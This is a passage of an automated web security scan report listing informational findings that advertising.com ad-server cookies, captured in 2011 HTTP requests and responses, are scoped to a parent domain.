Path:   /site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=5598
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.705487.0XMC
Set-Cookie: C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: F1=BQQHQ3kAAAAAPPsCAEAAgEABAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ruGnTaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2W+eDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: 43626829=_4dd01d04,1815717854,705487^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4
...[SNIP]...

13.28. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=9432
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; F1=BkRHQ3EBAAAABAAAAQAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:37:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.776691.0XMC
Set-Cookie: C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: F1=BwWHQ3EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTnZPuJelwD!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOuczr/p+I!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: 24438061=_4dd01d6c,3548225867,776691^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:37:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/3548225867?click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=0000958688/cstr=24438061=_4
...[SNIP]...

13.29. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=6506
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973880.776691.0XMC
Set-Cookie: F1=BQQHQ3EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: 28476770=_4dd01d04,5064751614,776691^973880^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 597

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3671.AOL/B5229711.6;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=00
...[SNIP]...

13.30. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BYaHQ3EBAAAABAAAAkAAgEA; BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwD!; ROLL=U6APLje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU8M!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.776691.0XMC
Set-Cookie: C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: F1=BgaHQ3EBAAAABAAAAoAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: BASE=x7Q9Gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpC!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: ROLL=U6APIje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZdN!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: 92522527=_4dd01da8,7085454702,776691^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/7085454702?click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=0000958688/cstr=92522527=_4
...[SNIP]...

13.31. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=help&t=1245
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=B4aHQ3EBAAAABAAAA0AAgEA; BASE=x7Q9Ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTNH!; ROLL=U6APPje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.996080.776692.0XMC
Set-Cookie: F1=BEbHQ3EBAAAABAAAA4AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: BASE=x7Q9Ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPN!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: ROLL=U6APMje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMO!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: 11211453=_4dd01db1,6258886388,776692^996080^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6421.272756.AOL-ADVERTISING/B5119351.58;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/m
...[SNIP]...

13.32. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=forgot_password&t=2041
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BMbHQ3EBAAAABAAAA8AAgEA; BASE=x7Q9Li23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SM!; ROLL=U6APNje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.964401.776692.0XMC
Set-Cookie: C2=29B0NFJwIsb0F7QqHjQCiZAYi+CCezixvB; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: F1=BY3HQ3EBAAAABAAAAABAeEA; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: ROLL=U6APSje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tYf50ZFTFJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: 12741032=_4dd01f76,7772530313,776692^964401^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:46:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1597

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.33. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BgaHQ3EBAAAABAAAAoAAgEA; BASE=x7Q9Gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpC!; ROLL=U6APIje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZdN!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1013955.776692.0XMC
Set-Cookie: F1=BkaHQ3EBAAAABAAAAsAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: BASE=x7Q9Hi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vP!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: ROLL=U6APJje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49A!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:33 GMT; path=/
Set-Cookie: 24692193=_4dd01da9,1681601282,776692^1013955^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:33 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 592

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2465.AOLanywhere/B5391584.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum=00010139
...[SNIP]...

13.34. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=9432
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
